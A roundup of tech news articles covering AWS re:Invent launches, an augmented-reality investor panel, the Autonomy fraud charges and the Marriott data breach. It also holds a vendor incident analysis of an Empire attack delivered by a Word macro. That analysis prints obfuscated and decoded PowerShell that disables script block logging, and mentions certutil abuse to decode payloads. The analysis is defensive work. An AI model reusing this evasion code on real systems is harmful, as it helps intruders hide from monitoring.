AWS launches a managed Kafka service

Kafka is an open-source tool for handling incoming streams of data. Like virtually all powerful tools, it’s somewhat hard to set up and manage. Today, Amazon’s AWS made this a bit easier for its users with the launch of Amazon Managed Streaming for Kafka. That’s a mouthful, but it’s essentially Kafka as a fully managed, highly available service, now available in public preview.
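Because the managed service runs Apache Kafka itself, standard Kafka clients should work against a cluster unchanged. As a minimal sketch using the kafka-python client (the broker address and topic name are placeholders, not values from the preview):

# Publish one event to a Kafka topic. The bootstrap broker string would
# come from the managed cluster's configuration.
from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers="broker1.example.com:9092")
producer.send("clickstream", b'{"user": 42, "page": "/home"}')
producer.flush()  # block until the message is actually delivered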

As AWS CTO Werner Vogels noted in his AWS re:Invent keynote, Kafka users traditionally had to do a lot of heavy lifting to set up a cluster on AWS and to ensure that it could scale and handle failures. “It’s a nightmare having to restart all the cluster and the main nodes,” he said. “This is what I would call the traditional heavy lifting that AWS is really good at solving for you.”

It’s interesting to see AWS launch this service given that it already offers a very similar product in Kinesis, which also focuses on ingesting streaming data. But there are plenty of applications on the market today that already use Kafka, and AWS is clearly interested in giving those users a pathway to either a managed Kafka service or AWS in general.

As with all things AWS, the pricing is a bit complicated, but a basic Kafka broker instance will start at $0.21 per hour, which works out to roughly $150 per month if it runs around the clock. You’re not likely to use just one instance, so for a somewhat useful setup with three brokers (already about $460 per month), a good amount of storage and some other fees, you’ll quickly pay well over $500 per month.


AWS announces a slew of new Lambda features

AWS launched Lambda in 2015 and with it helped popularize serverless computing. You simply write code that responds to event triggers, and AWS handles whatever compute, memory and storage you need to make it work. Today at AWS re:Invent in Las Vegas, the company announced several new features to make the service more developer friendly, while acknowledging that even though serverless reduces complexity, it still requires more sophisticated tools as it matures.

It’s called serverless because you don’t have to worry about the underlying servers. The cloud vendor takes care of all that for you, supplying exactly the resources needed to run your event and no more. That means you no longer have to provision and manage infrastructure yourself, and you pay only for the computing you need at any given moment to make the application work.
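To make the model concrete, a Lambda function at its simplest is a single handler that receives an event and returns a result; this minimal Python sketch (the event shape and return value are illustrative, not from the announcement) is the entire deployable unit:

# AWS invokes this handler once per event and bills per invocation;
# there is no server process for the developer to run or patch.
def handler(event, context):
    name = event.get("name", "world")
    return {"statusCode": 200, "body": f"Hello, {name}"}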

The way AWS works is that it tends to release a base service, then build more functionality on top of it as customer usage reveals new requirements. As Amazon CTO Werner Vogels pointed out in his keynote on Thursday, developers debate about tools, and everyone has their own idea of which ones to bring to the task every day.

For starters, the company decided to please the language folks by introducing support for new languages. Developers who use Ruby can now take advantage of Ruby support for AWS Lambda. “Now it’s possible to write Lambda functions as idiomatic Ruby code, and run them on AWS. The AWS SDK for Ruby is included in the Lambda execution environment by default,” Chris Munns from AWS wrote in a blog post introducing the new language support.

If C++ is your thing, AWS announced a C++ Lambda runtime. If neither of those matches your programming language tastes, AWS opened things up to just about any language with the new Lambda Runtime API, which Danilo Poccia from AWS described in a blog post as “a simple interface to use any programming language, or a specific language version, for developing your functions.”
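Under the hood, the Runtime API is a simple HTTP interface: a custom runtime loops forever, fetching the next event and posting back a result. Here is a rough Python sketch of that loop (endpoint paths follow the documented API; initialization and error handling are omitted):

# Skeleton of a custom runtime: long-poll for the next invocation,
# "handle" it, then post the result back to the Runtime API.
import os
import urllib.request

api = os.environ["AWS_LAMBDA_RUNTIME_API"]
base = f"http://{api}/2018-06-01/runtime/invocation"

while True:
    with urllib.request.urlopen(f"{base}/next") as resp:
        request_id = resp.headers["Lambda-Runtime-Aws-Request-Id"]
        event = resp.read()
    result = event  # a real runtime would invoke the handler here
    post = urllib.request.Request(f"{base}/{request_id}/response",
                                  data=result, method="POST")
    urllib.request.urlopen(post).close()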

For folks who have different tastes in IDEs (integrated development environments), AWS announced Lambda support for several popular ones, including PyCharm and IntelliJ (both in preview), as well as Visual Studio.

AWS didn’t want to stop with languages, though. The company also recognizes that even though Lambda (and serverless in general) is designed to remove a level of complexity for developers, that doesn’t mean all serverless applications consist of simple event triggers. As developers build more sophisticated serverless apps, they have to bring in system components and compose multiple pieces together, as Vogels explained in his keynote today.

To address this requirement, the company introduced Lambda Layers, which it describes as “a way to centrally manage code and data that is shared across multiple functions.” This could be custom code used by multiple functions or shared libraries that simplify business logic; a sketch of how a function might consume a layer follows.
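As a hedged illustration of the mechanics: a layer is a zip archive published once (for example with the aws lambda publish-layer-version CLI command) and then attached to many functions. At run time its contents are unpacked under /opt, and for Python runtimes anything in the layer’s python/ directory becomes importable. The module and function names below are invented for the example:

# Layer zip layout (hypothetical):  python/billing_common/validate.py
# Once the layer is attached, the shared module imports like any other.
from billing_common.validate import check_invoice  # resolved from the layer

def handler(event, context):
    check_invoice(event)  # shared business logic lives in the layer
    return {"ok": True}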

It also announced Step Functions service integrations, which allow developers to define a set of steps and triggers that connect to other Amazon services such as SageMaker, DynamoDB and Fargate. This could enable developers to build much more complex serverless applications that not only perform an action but also trigger other Amazon services; a sketch of what such a state machine might look like follows.
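For instance, a state machine written in the Amazon States Language can now call DynamoDB directly from a task state, with no intermediate Lambda function. A minimal sketch (the table name and fields are hypothetical):

{
  "StartAt": "RecordOrder",
  "States": {
    "RecordOrder": {
      "Type": "Task",
      "Resource": "arn:aws:states:::dynamodb:putItem",
      "Parameters": {
        "TableName": "Orders",
        "Item": { "OrderId": { "S.$": "$.orderId" } }
      },
      "End": true
    }
  }
}

The “S.$” key is States Language syntax for pulling a dynamic string value out of the state’s input rather than hard-coding it.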

As Lambda matures, developer requirements grow; these announcements and others are part of trying to meet those needs.


New AWS tool helps customers understand best cloud practices

Since 2015, AWS has had a team of solutions architects working with customers to make sure they are using AWS services in a way that meets best practices around a set of defined criteria. Today, the company announced a new Well-Architected Tool that helps customers do this themselves in an automated way, without the help of a human consultant.

As Amazon CTO Werner Vogels said in his keynote address at AWS re:Invent in Las Vegas, it’s hard to scale a human team inside the company to meet the needs of thousands of customers, especially when so many want to be sure they are complying with these best practices. He indicated that AWS even brought on a network of certified partners to help, but that still has not been enough to meet demand.

In typical AWS fashion, the company decided to create a service to help customers measure how well they are doing in terms of operational excellence, security, reliability, cost optimization and performance efficiency. Customers can run this tool against the AWS services they are using and get a full report of how they measure up against these five pillars.

“I think of it as a way to make sure that you are using the cloud right, and that you are using it well,” Jeff Barr wrote in a blog post introducing the new service.

Instead of working with a human to analyze your systems, you answer a series of questions and the tool generates a report based on those answers. When the process is complete, you can produce a PDF report with all the recommendations for your particular situation.


While it’s doubtful that such an approach can be as comprehensive as a conversation between client and consultant, it’s a starting point that at least gets you thinking about these issues, and since the service is free, you have little to lose by trying the tool and seeing what it tells you.


Enterprise AR is an opportunity to ‘do well by doing good,’ says General Catalyst

A founder-investor panel on augmented reality (AR) technology here at TechCrunch Disrupt Berlin suggests growth hopes for the space have regrouped around enterprise use-cases, after the VR consumer hype cycle landed with yet another flop in the proverbial ‘trough of disillusionment’.

Matt Miesnieks, CEO of mobile AR startup 6d.ai, conceded the space has generally been on another downer but argued it’s coming out of its third hype cycle now with fresh b2b opportunities on the horizon.

6d.ai investor General Catalyst‘s Niko Bonatsos was also on stage, and both suggested the challenge for AR startups is figuring out how to build for enterprises so the b2b market can carry the mixed reality torch forward.

“From my point of view the fact that Apple, Google, Microsoft, have made such big commitments to the space is very reassuring over the long term,” said Miesnieks. “Similar to the smartphone industry ten years ago we’re just gradually seeing all the different pieces come together. And as those pieces mature we’ll eventually, over the next few years, see it sort of coalesce into an iPhone moment.”

“I’m still really positive,” he continued. “I don’t think anyone should be looking for some sort of big consumer hit product yet but in verticals in enterprise, and in some of the core tech enablers, some of the tool spaces, there’s really big opportunities there.”

Investors shot the arrow over the target where consumer VR/AR is concerned because they’d underestimated how challenging the content piece is, Bonatsos suggested.

“I think what we got wrong is probably the belief that we thought more indie developers would have come into the space and that by now we would probably have, I don’t know, another ten Pokémon-type consumer massive hit applications. This is not happening yet,” he said.

“I thought we’d have a few more games because games always lead the adoption to new technology platforms. But in the enterprise this is very, very exciting.”

“For sure also it’s clear that in order to have the iPhone moment we probably need to have much better hardware capabilities,” he added, suggesting everyone is looking to the likes of Apple to drive that forward in the future. On the plus side he said current sentiment is “much, much much better than what it was a year ago”.


Discussing potential b2b applications for AR tech one idea Miesnieks suggested is for transportation platforms that want to link a rider to the location of an on-demand and/or autonomous vehicle.

Another area of opportunity he sees is working with hardware companies to add spatial awareness to devices such as smartphones and drones, expanding their capabilities.

More generally they mentioned training for technical teams, field sales and collaborative use-cases as areas with strong potential.

“There are interesting applications in pharma, oil & gas where, with the aid of the technology, you can do very detailed stuff that you couldn’t do before because… you can follow everything on your screen and you can use your hands to do whatever it is you need to be doing,” said Bonatsos. “So that’s really, really exciting.

“These are some of the applications that I’ve seen. But it’s early days. I haven’t seen a lot of products in the space. It’s more like there’s one dev shop working with the chief innovation officer of one specific company that is much more forward thinking, and they want to come up with a really early demo.

“Now we’re seeing some early stage tech startups that are trying to attack these problems. The good news is that good dollars is being invested in trying to solve some of these problems — and whoever figures out how to get dollars from the… bigger companies, these are real enterprise businesses to be built. So I’m very excited about that.”

At the same time, the panel delved into some of the complexities and social challenges facing technologists as they try to integrate blended reality into, well, the real deal.

Including raising the spectre of Black Mirror-style dystopia once smartphones can recognize and track moving objects in a scene — and 6d.ai’s tech shows that’s coming.

Miesnieks showed a brief video demo of 3D technology running live on a smartphone that’s able to identify cars and people moving through the scene in real time.

“Our team were able to solve this problem probably a year ahead of where the rest of the world is at. And it’s exciting. If we showed this to anyone who really knows 3D they’d literally jump out of the chair. But… it opens up all of these potentially unintended consequences,” he said.

“We’re wrestling with what might this be used for. Sure it’s going to make Pokémon game more fun. It could also let a blind person walk down the street and have awareness of cars and people and they may not need a cane or something.

“But it could let you like tap and literally have people be removed from your field of view and so you only see the type of people that you want to look at. Which can be dystopian.”

He pointed to issues being faced by the broader technology industry now, around social impacts and areas like privacy, adding: “We’re seeing some of the social impacts of how this stuff can go wrong, even if you assume good intentions.

“These sort of breakthroughs that we’re having are definitely causing us to be aware of the responsibility we have to think a bit more deeply about how this might be used for the things we didn’t expect.”

From the investor point of view Bonatsos said his thesis for enterprise AR has to be similarly sensitive to the world around the tech.

“It’s more about can we find the domain experts, people like Matt, that are going to do well by doing good. Because there are a tonne of different parameters to think about here and [you need] the credibility in the market to make it happen,” he suggested, noting: “It’s much more like traditional enterprise investing.”

“This is a great opportunity to use this new technology to do well by doing good,” Bonatsos continued. “So the responsibility is here from day one to think about privacy, to think about all the fake stuff that we could empower. What do we want to do, what do we want to limit? As well as, as we’re creating this massive, augmented reality, 3D version of the world — who is going to own it, and share all this wealth? How do we make sure that there’s going to be a whole new ecosystem that everybody can take part in? It’s very interesting stuff to think about.”

“Even if we do exactly what we think is right, and we assume that we have good intentions, it’s a big grey area in lots of ways and we’re going to make lots of mistakes,” conceded Miesnieks, after discussing some of the steps 6d.ai has taken to try to reduce privacy risks around its technology — such as local processing coupled with anonymizing/obfuscating any data that is taken off the phone.

“When [mistakes] happen — not if, when — all that we’re going to be able to rely on is our values as a company and the trust that we’ve built with the community by saying these are our values and then actually living up to them. So people can trust us to live up to those values. And that whole domain of startups figuring out values, communicating values and looking at this sort of abstract ‘soft’ layer — I think startups as an industry have done a really bad job of that.

“Even big companies. There’s only a handful that you could say… are pretty clear on their values. But for AR and this emerging tech domain it’s going to be, ultimately, the core of whether people trust us.”

Bonatsos also pointed to rising political risk as a major headwind for startups in this space — noting how China’s government has decided to regulate the gaming market because of social impacts.

“That’s unbelievable. This is where we’re heading with the technology world right now. Because we’ve truly made it. We’ve become mainstream. We’re the incumbents. Anything we build has huge, huge intended and unintended consequences,” he said.

“Having a government that regulates how many games can be built or how many games can be released — that’s incredible. No company had to think of that before as a risk. But when people are spending so many hours and so much money on the tech products they are using every day, this is the [inevitable] next step.”

DoJ charges Autonomy founder with fraud over $11BN sale to HP

U.K. entrepreneur turned billionaire investor Mike Lynch has been charged with fraud in the U.S. over the 2011 sale of his enterprise software company.

Lynch sold Autonomy, the big data company he founded back in 1996, to computer giant HP for around $11 billion some seven years ago.

But within a year around three-quarters of the value of the business had been written off, with HP accusing Autonomy’s management of accounting misrepresentations and disclosure failures.

Lynch has always rejected the allegations, and after HP sought to sue him in U.K. courts he countersued in 2015.

Meanwhile, the U.K.’s own Serious Fraud Office dropped an investigation into the Autonomy sale in 2015 — finding “insufficient evidence for a realistic prospect of conviction.”

But now the DoJ has filed charges in a San Francisco court, accusing Lynch and other senior Autonomy executives of making false statements that inflated the value of the company.

They face 14 counts of conspiracy and fraud, according to Reuters — charges that carry a maximum penalty of 20 years in prison.

We’ve reached out to Lynch’s fund, Invoke Capital, for comment on the latest development.

The BBC has obtained a statement from his lawyers, Chris Morvillo of Clifford Chance and Reid Weingarten of Steptoe & Johnson, which describes the indictment as “a travesty of justice.”

The statement also claims Lynch is being made a scapegoat for HP’s failures, framing the allegations as a business dispute over the application of U.K. accounting standards. 

Two years ago we interviewed Lynch onstage at TechCrunch Disrupt London and he mocked the morass of allegations still swirling around the acquisition as “spin and bullshit.”

Following the latest developments, the BBC reports that Lynch has stepped down as a scientific adviser to the U.K. government.

“Dr. Lynch has decided to resign his membership of the CST [Council for Science and Technology] with immediate effect. We appreciate the valuable contribution he has made to the CST in recent years,” a government spokesperson told it.

Marriott: Data on 500 Million Guests Stolen in 4-Year Breach

Hospitality giant Marriott today disclosed a massive data breach exposing the personal and financial information of as many as a half billion customers who made reservations at any of its Starwood properties over the past four years.

Marriott said the breach involved unauthorized access to a database containing guest information tied to reservations made at Starwood properties on or before Sept. 10, 2018, and that its ongoing investigation suggests the perpetrators had been inside the company’s networks since 2014.

Marriott said the intruders encrypted information from the hacked database (likely to avoid detection by any data-loss prevention tools when removing the stolen information from the company’s network), and that its efforts to decrypt that data set were not yet complete. But so far the hotel network believes that the encrypted data cache includes information on up to approximately 500 million guests who made a reservation at a Starwood property.

“For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date and communication preferences,” Marriott said in a statement released early Friday morning.

Marriott added that customer payment card data was protected by encryption technology, but that the company couldn’t rule out the possibility the attackers had also made off with the encryption keys needed to decrypt the data.

The hotel chain did not say precisely when in 2014 the breach was thought to have begun, but it’s worth noting that Starwood disclosed its own breach involving more than 50 properties in November 2015, just days after being acquired by Marriott. According to Starwood’s disclosure at the time, that earlier breach stretched back at least one year — to November 2014.

Back in 2015, Starwood said the intrusion involved malicious software installed on cash registers at some of its resort restaurants, gift shops and other payment systems that were not part of its guest reservation or membership systems.

However, this would hardly be the first time a breach at a major hotel chain ballooned from one limited to restaurants and gift shops into a full-blown intrusion involving guest reservation data. In Dec. 2016, KrebsOnSecurity broke the news that banks were detecting a pattern of fraudulent transactions on credit cards that had one thing in common: They’d all been used during a short window of time at InterContinental Hotels Group (IHG) properties, including Holiday Inns and other popular chains across the United States.

It took IHG more than a month to confirm that finding, but the company said in a statement at the time it believed the intrusion was limited to malware installed at point of sale systems at restaurants and bars of 12 IHG-managed properties between August and December 2016.

In April 2017, IHG acknowledged that its investigation showed cash registers at more than 1,000 of its properties were compromised with malicious software designed to siphon customer debit and credit card data — including those used at front desks in certain IHG properties.

Marriott says its own network does not appear to have been affected by this four-year data breach, and that the investigation only identified unauthorized access to the separate Starwood network.

Starwood hotel brands include W Hotels, St. Regis, Sheraton Hotels & Resorts, Westin Hotels & Resorts, Element Hotels, Aloft Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, Four Points by Sheraton and Design Hotels that participate in the Starwood Preferred Guest (SPG) program.

Marriott is offering affected guests in the United States, Canada and the United Kingdom a free year’s worth of service from WebWatcher, one of several companies that advertise the ability to monitor the cybercrime underground for signs that the customer’s personal information is being traded or sold.

The breach announced today is just the latest in a long string of intrusions involving credit card data stolen from major hotel chains over the past four years — with many chains experiencing multiple breaches. In October 2017, Hyatt Hotels suffered its second card breach in as many years. In July 2017, the Trump Hotel Collection was hit by its third card breach in two years.

In Sept. 2016, Kimpton Hotels acknowledged a breach first disclosed by KrebsOnSecurity. Other breaches first disclosed by KrebsOnSecurity include two separate incidents at White Lodging hotels; a 2015 incident involving card-stealing malware at Mandarin Oriental properties; and a 2015 breach affecting Hilton Hotel properties across the United States.

This is a developing story, and will be updated with analysis soon.

How We Detected a Real Empire Exploit Attack

Introduction

This article discusses an attack that took place during a proof of concept (POC) of the SentinelOne solution and the Vigilance service for a potential banking customer. The prospect, which has since become a customer, simulated attacks targeting endpoints protected by the SentinelOne Agent. Although this was a noisy environment with various attack vectors, the service was able to distinguish a real attack from the simulated ones and mitigate it.

This case highlights the importance of a professional security team that is sensitive enough to spot anomalous and suspicious events, not only during routine monitoring but especially during sensitive periods such as POCs, onboarding, post-breach exploration and penetration testing.

Flow of Events

We were invited for a POC at a large banking customer. A few days into the POC, the Vigilance team noticed multiple threats on the same machine in a very short period of time, including threats typically used in penetration testing. For example:

  • EICAR test sample
  • CQHashDumpv2 (a password-dumping tool)
  • A NetCat installation

The team then shared this information with the customer. They were told that these events were part of approved tests on this machine.

About a week later the SentinelOne Agent triggered alerts for a Firefox exploit.

Here is the attack storyline as presented on the SentinelOne console:

Figure 1: Attack Storyline as Seen on SentinelOne Console

The attack story tells us what really happened on this machine. For example, it displays running processes, the relationships between them and the commands they ran.

The team started to investigate the threat and found these interesting points:

1) The attack was initiated by a malicious Word document downloaded through the Firefox browser, probably after being received via email. The document uses a macro to open a PowerShell console and run known Empire code.

The Agent detected the exploit, as can be seen in Figure 2.

Figure 2: Detection of Firefox Exploit

Referring to VirusTotal records, the team was able to determine that the file was new: it was first submitted to VirusTotal at 2018-10-24 09:17:01 UTC, only two hours before it was opened on the customer’s machine.

Figure 3: Detection History of the Threat File in VT

2) At the time the threat was detected, only 12 engines out of 57 in VT recognized the document as malicious, among them the SentinelOne Static AI engine. This AI-based engine is completely signature-less, so it doesn’t require frequent updates.

Figure 4: 12 Engines out of 57 Detected the File as Malicious in VT

3) When the team investigated the attack story, they spotted obfuscated Base64 code that had been loaded into PowerShell.

Figure 5: Obfuscated Base64 Code

Here is the obfuscated code:

-W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJ

The team then de-obfuscated the Base64 code in two phases:

Semi-obfuscated code:

If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr -ge 3){${g`Pf}=[REf].ASSeMbly.GETTYPE(('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils'))."GeTFIe`Ld"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});If(${g`pc}[('S'+'cr'+'iptB')+('lo'+'ckLo'+'ggi'+'ng')]){${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0;${g`PC}[('Scri'+'p'+'tB')+('lock'+'Loggi'+'n'+'g')][('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')]=0}${V`Al}=[ColleCtioNs.GeNeR

De-obfuscated code:

If(${PSVersIoNTAble}.PSVersioN.MaJOr -ge 3){${gPf}=[REf].ASSeMbly.GETTYPE(('System.Management.Automation.Utils'))."GeTFIeLd"(('cachedGroupPolicySettings'),'N'+('onPublic,Static'));If(${gpF}){${GPc}=${Gpf}.GetVALUe(${NuLl});If(${gpc}[('ScriptB')+('lockLogging')]){${GPC}[('ScriptB')+('lockLogging')][('EnableScriptB')+('lockLogging')]=0;${gPC}[('ScriptB')+('lockLogging')][('EnableScriptBlockInvocationLogging')]=0}${V`Al}=[ColleCtioNs.GeNeR
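The first de-obfuscation phase is plain Base64 decoding; the second (undoing the string concatenation and backtick tricks inside the PowerShell itself) was done separately. For illustration, the first Base64 literal on the command line decodes with a couple of lines of Python:

# Decode the first Base64 literal from the PowerShell command line.
import base64

blob = "c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=="
print(base64.b64decode(blob).decode("ascii"))
# -> stop-process -name regsvr32 -Force -ErrorAction SilentlyContinue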

4) The code turned out to be well-known Empire code hosted on GitHub:

https://github.com/EmpireProject/Empire/blob/master/lib/listeners/http_hop.py

With that mystery solved, the team kept looking for additional indicators.

5) A suspicious file was loaded into the certutil process:

temp.txt hvKqcJJPFnm7.txt

The team suspected this file because its name is atypical for a text file: a run of randomized letters with “.txt” as part of the file name.
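certutil is a legitimate Windows certificate utility, but it is frequently abused as a living-off-the-land binary to decode Base64-encoded payloads smuggled in as text files. The article does not show the exact command line used here, but the typical pattern of such abuse looks like certutil -decode temp.txt hvKqcJJPFnm7.txt, which would turn a Base64 “text” file back into a binary payload.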

Figure 6: Suspicious File Loaded into certutil Process

6)    The team suspected a BAT file that was loaded into cmd:

\Device\HarddiskVolume2\Users\FIM2\AppData\Roaming\66tGuhDsc2K9N.bat

It raised suspicions due to the file’s location and name: a long randomized name in the AppData\Roaming folder.

Figure 7: Suspicious BAT File

Vigilance Team Response

Once the threat was verified as real, the team responded with mitigation actions in real time, despite the fact that the customer was in the middle of penetration testing.

The SentinelOne solution offers a range of mitigation actions, such as killing the malicious process, quarantining the files related to the threat, removing any changes the malware made to the system, and even rolling back the machine to its last known good state before the infection.

In this case, the customer chose to roll back the machine after the team provided all the relevant data. This was accomplished using the SentinelOne Agent’s rollback mechanism.

The team also gave the customer all available forensic data and context, making sure any similar malware will be mitigated on all SentinelOne-protected machines.

This use case emphasizes the importance of a professional SOC team in identifying and tracking zero-day threats. While the product itself is autonomous, there is real value in providing context, further analysis and recommendations for further action.

Conclusion

The SentinelOne Vigilance team homed in on suspicious events and, armed with their expertise and SentinelOne data, shared the information with the customer. Everyone agreed: the Vigilance team made a significant contribution to exposing a real attack attempt.

For a banking customer, such an attack could have severe consequences, translating into high financial costs and reputational damage. The fact that the attack was carried out during a POC could have let it slip under the radar. Here, the expertise and experience of a good SOC team, in conjunction with a successful next-gen endpoint protection solution, made the difference.

What is Vigilance?

Vigilance is SentinelOne’s Managed Detection and Response (MDR) service, provided by a group of highly trained cyber-security analysts. It empowers IT/SOC teams by accelerating the detection of, prioritization of and response to advanced cyber threats, reducing the risk of missing a critical alert that needs attention. The Vigilance analysts assess all alerts, review raw threat data, process operations and network connections, and analyze samples as needed. Quite often the group investigates interesting cases, and one of them is the subject of this article.



AWS launches new time series database

AWS announced a new time series database today at AWS re:Invent in Las Vegas. The new product, called Amazon Timestream, is a fully managed database designed to track items over time, which can be particularly useful for Internet of Things scenarios.

“With time series data, each data point consists of a timestamp and one or more attributes and it really measures how things change over time and helps drive real time decisions,” AWS CEO Andy Jassy explained.
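As a hedged illustration of the data model Jassy described (the write API was not public at announcement time, so the field names here are illustrative rather than final), a single point pairs a timestamp with identifying attributes and a measured value:

# One time series point: identifying attributes (dimensions), a measure
# and a timestamp. Names and shape are illustrative, not the final API.
import time

point = {
    "Dimensions": [
        {"Name": "device_id", "Value": "sensor-17"},
        {"Name": "site", "Value": "berlin-plant"},
    ],
    "MeasureName": "temperature_c",
    "MeasureValue": "21.4",
    "Time": str(int(time.time() * 1000)),  # epoch milliseconds
}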

Jassy sees a problem, though, with existing open-source and commercial solutions, which he says don’t scale well and are hard to manage. This is, of course, the kind of problem a cloud service like AWS often helps solve.

Not surprisingly, with customers looking for a good time series database solution, AWS decided to create one itself. Jassy said the company built Amazon Timestream from the ground up, with an architecture that organizes data by time intervals and enables time series-specific data compression, which leads to less scanning and faster performance.

“Timestream automates rollups, retention, tiering and compression, so time-series data can be efficiently stored and processed. Timestream’s query engine adapts to the location and format of data making it easier and faster to query time-series data,” AWS’s Jeff Barr wrote in a blog post summarizing several new announcements including Timestream.

AWS claims Timestream will be a thousand times faster at a tenth of the cost of a relational database, and of course it scales up and down as required and includes the analytics capabilities you need to understand the data you are tracking.


AWS announces new Inferentia machine learning chip

AWS is not content to cede any part of any market to any company. When it comes to machine learning chips, names like Nvidia or Google come to mind, but today at AWS re:Invent in Las Vegas, the company announced a new dedicated machine learning chip of its own called Inferentia.

“Inferentia will be a very high-throughput, low-latency, sustained-performance very cost-effective processor,” AWS CEO Andy Jassy explained during the announcement.

Holger Mueller, an analyst with Constellation Research, says that while Amazon is far behind, this is a good step for them as companies try to differentiate their machine learning approaches in the future.

“The speed and cost of running machine learning operations — ideally in deep learning — are a competitive differentiator for enterprises. Speed advantages will make or break success of enterprises (and nations when you think of warfare). That speed can only be achieved with custom hardware, and Inferentia is AWS’s first step to get into this game,” Mueller told TechCrunch. As he pointed out, Google has a 2-3 year head start with its TPU infrastructure.

Inferentia supports INT8, FP16 and mixed-precision data types. What’s more, it supports multiple machine learning frameworks, including TensorFlow, Caffe2 and ONNX.

Of course, being an Amazon product, it also supports data from popular AWS products such as EC2, SageMaker and the new Elastic Inference Engine announced today.

While the chip was announced today, Jassy indicated it won’t actually be available until next year.


Amazon Textract brings intelligence to OCR

One of the challenges just about every business faces is converting forms to a useful digital format, a job that has typically meant human data entry clerks keying the data into a computer. The state of the art has been to read forms automatically with OCR, but as AWS CEO Andy Jassy explained, OCR is basically just a dumb text reader; it doesn’t recognize text types. Amazon wanted to change that, and today it announced Amazon Textract, an intelligent OCR tool that moves data from forms into a more usable digital format.

In an example, he showed a form with tables. Regular OCR didn’t recognize the table and interpreted it as a string of text. Textract is designed to recognize common page elements like tables and pull the data out in a sensible way.

Jassy said that forms also change often, and if you are using a template as a workaround for OCR’s lack of intelligence, the template breaks as soon as anything moves. To fix that, Textract is smart enough to understand common data types like Social Security numbers, dates of birth and addresses, and it interprets them correctly no matter where they fall on the page.

“We have taught Textract to recognize this set of characters is a date of birth and this is a Social Security number. If forms change, Textract won’t miss it,” Jassy explained.
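For developers, Textract is exposed as an API. As a hedged sketch of what a call might look like (based on the later-documented boto3 interface; the bucket and file names are placeholders), you ask for structural features such as tables and forms rather than raw text:

# Ask Textract for table and form structure in a scanned document in S3.
import boto3

textract = boto3.client("textract")
result = textract.analyze_document(
    Document={"S3Object": {"Bucket": "my-forms-bucket", "Name": "w2.png"}},
    FeatureTypes=["TABLES", "FORMS"],  # structure, not just raw text
)
for block in result["Blocks"]:
    if block["BlockType"] == "TABLE":
        print("found a table:", block["Id"])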
